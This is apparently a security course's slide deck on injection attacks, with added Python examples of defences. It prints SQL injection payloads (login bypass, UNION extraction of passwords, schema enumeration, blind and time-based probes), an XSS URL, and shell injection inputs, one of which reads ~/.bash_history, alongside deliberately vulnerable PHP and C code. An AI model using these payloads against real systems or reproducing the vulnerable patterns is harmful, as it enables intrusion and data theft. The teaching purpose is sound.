SQL Injection
Command Injection Attacks
‹#›
Command Injection Attacks
A class of attacks in which
… data provided by the user
… is passed to an application
… which interprets it as commands
‹#›
SQL Injection

$query = "SELECT * FROM users WHERE user_id='$_POST[user]'
AND password='$_POST[password]'"

User: yval
Password: secret

$query = "SELECT * FROM users WHERE user_id='yval'
AND password='secret'"

User: ' OR 1=1;--
Password: secret

$query = "SELECT * FROM users WHERE user_id='' OR 1=1;--'
AND password='secret'"
‹#›
A More Realistic Example

$query = "SELECT * FROM users WHERE user_id='$_POST[user]'";
$stmt = $db->query($query);
$row = $stmt->fetch(PDO::FETCH_ASSOC);
if (!password_match($_POST['password'], $row['password'])) {
. . .
}

User: ' UNION SELECT 'admin','$2a$05$b...
Password

$query = "SELECT * FROM users WHERE user_id='' UNION
SELECT 'admin', '$2a$05$b...'; --";
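The two login queries above, rebuilt as an added example (not code from the slides) so the effect of string concatenation versus placeholder binding can be run and compared. It uses an in-memory SQLite table with a constructed user row and a placeholder `hash_pw()` standing in for a real password hash; the same binding applies to any other untrusted value spliced into SQL, such as the X-Forwarded-For header used later in these slides.

```python
import sqlite3

def hash_pw(pw):
    return "hash(" + pw + ")"  # placeholder for a real password hash (bcrypt/argon2)

def make_db():
    # Constructed demo data standing in for the slide's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('yval', ?)", (hash_pw("secret"),))
    return db

def lookup_vulnerable(db, user):
    # Same construction as the PHP on the slide: user text spliced into SQL.
    query = "SELECT * FROM users WHERE user_id='" + user + "'"
    return db.execute(query).fetchone()

def lookup_safe(db, user):
    # Placeholder binding: the value travels separately from the SQL text and
    # is never parsed as part of the statement, whatever quotes it contains.
    return db.execute("SELECT * FROM users WHERE user_id=?", (user,)).fetchone()

def login(db, lookup, user, password):
    # The "more realistic" flow: fetch the row, then check the hash in code.
    row = lookup(db, user)
    return row is not None and row[1] == hash_pw(password)

# Payloads from the slides. OR 1=1 returns the real user's row, so the hash
# check in code still fails; UNION appends a fake admin row whose hash the
# attacker chose, so the check passes against the attacker's own password.
OR_PAYLOAD = "' OR 1=1;--"
UNION_PAYLOAD = "' UNION SELECT 'admin', '" + hash_pw("attacker") + "'; --"

if __name__ == "__main__":
    db = make_db()
    for name, lookup in (("concat", lookup_vulnerable), ("bound", lookup_safe)):
        print(name, "yval/secret:", login(db, lookup, "yval", "secret"))
        print(name, "OR payload:", login(db, lookup, OR_PAYLOAD, "anything"))
        print(name, "UNION payload:", login(db, lookup, UNION_PAYLOAD, "attacker"))
```

With binding, both payloads are looked up as literal (non-existent) user ids and the login fails; with concatenation the UNION payload authenticates as admin.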
‹#›
Querying the DB

http://www.mysite.com/article.php?id=1234

$query = "select * from articles where id='$_GET[id]'";
$stmt = $db->query($query);
$row = $stmt->fetch(PDO::FETCH_ASSOC);
...
echo $row['title'];

http://www.mysite.com/article.php?id=xxx' UNION
SELECT 1,2,password,3 FROM users WHERE user='admin';--
‹#›
Querying DB Schema
How does the attacker know the database structure?
Query metadata in information_schema
http://www.mysite.com/article.php?id=xxx' UNION
SELECT 1,2,group_concat(schema_name),3
FROM information_schema.schemata;--

http://www.mysite.com/article.php?id=xxx' UNION
SELECT 1,2,group_concat(table_name),3
FROM information_schema.tables
WHERE table_schema='articles';--
‹#›
Blind SQL Injection (content-based)
$query = "SELECT * FROM users WHERE name='$_POST[user]'";
$stmt = $db->query($query);
if ($stmt->rowCount() != 1) {
    echo "User does not exist";
} else {
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    sendNewPassword($row['email']);
    echo "Email sent";
}

Xxxxx' UNION SELECT 1,2,3,4 FROM
information_schema.tables WHERE
table_schema='users' having
substring(group_concat(table_name),1,1)='a'; --
‹#›
Blind SQL Injection (time-based)
What to do when there is no user-visible output?
Xxxxx' UNION SELECT
IF(SUBSTRING(user_password,1,1) = 'a',
BENCHMARK(5000000,ENCODE('MSG','Salt')),
null) FROM users
WHERE user_id = 1;--
‹#›
Exploits of a Mom
Her daughter is named Help I’m trapped in a driver’s license factory.
‹#›
Injection Mechanisms
User Input
Server Variables
Cookies
function ip_adr() {
    // The X-Forwarded-For header is attacker-controlled, just like form input
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip_adr = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip_adr = $_SERVER["REMOTE_ADDR"];
    }
    return $ip_adr;
}

$query = "SELECT * FROM badHosts WHERE ip='".ip_adr()."'";
‹#›
Setting Cookies
Implement an HTTP client
E.g. using Python
Use wget
See man page
Edit browser’s cookie storage
Install a browser plug-in
Run a Burp proxy
‹#›
Another example
http://mysite.com/hello.php?name=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E
(URL-decoded, the name parameter is: <script>alert('XSS');</script>)
Hello
‹#›
eBay, 2014
Source: http://www.makeuseof.com/tag/ebay-security-breach-reconsider-membership/
‹#›
eBay, 2017
Source: https://news.netcraft.com/archives/2017/02/17/hackers-still-exploiting-ebays-stored-xss-vulnerabilities-in-2017.html
‹#›
Shell Injection
#include <stdlib.h>
#include <string.h>
#define CMD_MAX 256   /* buffer size; the slide does not give a value, this one is assumed */

int main(int argc, char** argv) {
    char cmd[CMD_MAX] = "/bin/cat ";
    strcat(cmd, argv[1]);   /* argv[1] is spliced into a shell command line unchecked */
    system(cmd);            /* the shell parses the whole string, metacharacters included */
}
./program “/dev/null; ls”
Adapted from: https://www.owasp.org/index.php/Command_Injection
‹#›
Attacking the Washington, D.C. Internet Voting System
Wolchok et al. FC 2012
run("gpg", "--trust-model always -o
\"#{File.expand_path(dst.path)}\" -e -r
\"#{@recipient}\"
\"#{File.expand_path(src.path)}\"")
Upload file: foo.$(cat ~/.bash_history)
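Both the C program above and the gpg call built from an uploaded file name share one root cause: untrusted text is pasted into a string that a shell will parse. This added example (not code from the slides or from the cited paper) shows the two fixes in Python: pass an argv list so no shell is involved, or, where a shell string is unavoidable, quote the value with `shlex.quote`. It assumes `/bin/cat` exists on the host.

```python
import shlex
import subprocess

def cat_vulnerable_cmdline(user_arg):
    # Mirrors the C program on the slide: the argument is concatenated into a
    # command string that a shell will parse, so ';' and '$(...)' are live.
    # Returned rather than executed so the reader can see what the shell gets.
    return "/bin/cat " + user_arg          # this is what os.system() would receive

def quote_for_shell(user_arg):
    # If a shell string is unavoidable, shlex.quote wraps the value so the
    # shell treats it as a single word and never sees its metacharacters.
    return "/bin/cat " + shlex.quote(user_arg)

def cat_safe(user_arg):
    # argv list and no shell: the whole string is one argument to /bin/cat,
    # metacharacters included, so it can only ever name a file.
    proc = subprocess.run(["/bin/cat", user_arg], capture_output=True, text=True)
    return proc.returncode, proc.stdout

if __name__ == "__main__":
    for payload in ("/dev/null; ls", "foo.$(cat ~/.bash_history)"):   # from the slides
        print(cat_vulnerable_cmdline(payload))   # the shell would run a second command
        print(quote_for_shell(payload))          # one quoted word
        print(cat_safe(payload))                 # non-zero exit: no such file
```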
‹#›
Source: Wolchok et al. FC 2012
‹#›
Mitigation
Whitelist
Look for patterns that demonstrate that the data is valid. Reject everything else
Do you know the format of the input?
What characters can go into a name?
Blacklist
Look for patterns that demonstrate that the data is invalid. Everything else is valid.
Are you aware of all possible attacks?
Escape
Transform data to ensure safety
Easier said than done
‹#›
Whitelisting example
public boolean isValidZip(String in) {
    if (in == null)
        return false;
    // Pattern.matches() requires the whole string to match: 5 digits, optionally -4 digits
    if (Pattern.matches("^\\d{5}(-\\d{4})?$", in))
        return true;
    return false;
}
‹#›
ZIP – Zone Improvement Program
Canada ZIP codes
Whitelisting example
if (isValidZip(request.getParameter("zip")) == false) {
    return response.BAD_ZIP;
}
// parameter contains ZIP code, continue
show_zip = "" + request.getParameter("zip") + "";
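The same whitelist check as the Java `isValidZip` above, written as an added Python example (not code from the slides), together with the validate-then-use flow. It goes slightly beyond the slide to show two pitfalls a port of that regex can run into: with `re.match`, `$` also matches just before a trailing newline, and in Python 3 `\d` matches non-ASCII digits (Java's `\d` is ASCII-only by default).

```python
import re

def is_valid_zip(value):
    # Whitelist: accept only the two known ZIP shapes, reject everything else.
    # [0-9] instead of \d so Unicode digits are rejected; fullmatch anchors
    # both ends and does not allow a trailing newline.
    if value is None:
        return False
    return re.fullmatch(r"[0-9]{5}(-[0-9]{4})?", value) is not None

def is_valid_zip_loose(value):
    # Pitfall version of the same regex: '$' with re.match also matches just
    # before a final newline, so "12345\n" is accepted, and \d lets
    # non-ASCII digits through. Shown as the pitfall, not as a check to use.
    if value is None:
        return False
    return re.match(r"^\d{5}(-\d{4})?$", value) is not None

def handle_zip(params):
    # Same flow as the slide: validate first, only then use the parameter.
    zip_code = params.get("zip")
    if not is_valid_zip(zip_code):
        return "BAD_ZIP"
    return "ZIP accepted: " + zip_code

if __name__ == "__main__":
    for sample in ("12345", "12345-6789", "1234", "12345\n", "12345<script>", None):
        print(repr(sample), is_valid_zip(sample), is_valid_zip_loose(sample))
```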
‹#›
Source: https://www.drupal.org/node/129165
‹#›
Source: http://www.wired.com/2015/11/null/
‹#›
Class Exercise
What is the format of an email address?
‹#›
Email address – Local part
Source: Wikipedia
‹#›
Blacklisting example
public boolean dontXSSmeBro(String in) {
    if (in == null)
        return false;
    if (Pattern.matches("